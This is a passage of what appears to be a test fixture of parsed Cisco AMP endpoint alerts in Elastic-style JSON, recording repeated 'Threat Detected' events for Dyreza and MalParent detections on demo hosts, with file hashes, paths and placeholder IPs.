"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 228792, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258577620009042", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 637000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258577620009000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 230111, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:28.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258526080401489", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 609000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258526080401000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 231430, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:16.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258474540793936", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 987000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258474540794000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 232749, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258423001186383", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 959000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258423001186000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 234068, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668103677542427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 470000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668103677542000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 235387, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668099382575128", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 696000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668099382575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 239357, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258371461578830", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258371461579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 240676, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258324216938573", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 403000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258324216938000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 241995, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258272677331020", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 298000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258272677331000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 243314, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258221137723467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 270000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258221137723000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 244633, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:05.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258169598115914", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 648000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258169598116000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 245952, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667841684537367", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 532000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667841684537000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 247271, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258118058508361", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 636000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258118058508000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 251240, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667837389570068", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 689000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667837389570000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 252559, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258066518900808", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 608000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258066518901000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 253878, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258014979293255", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 581000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258014979293000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": 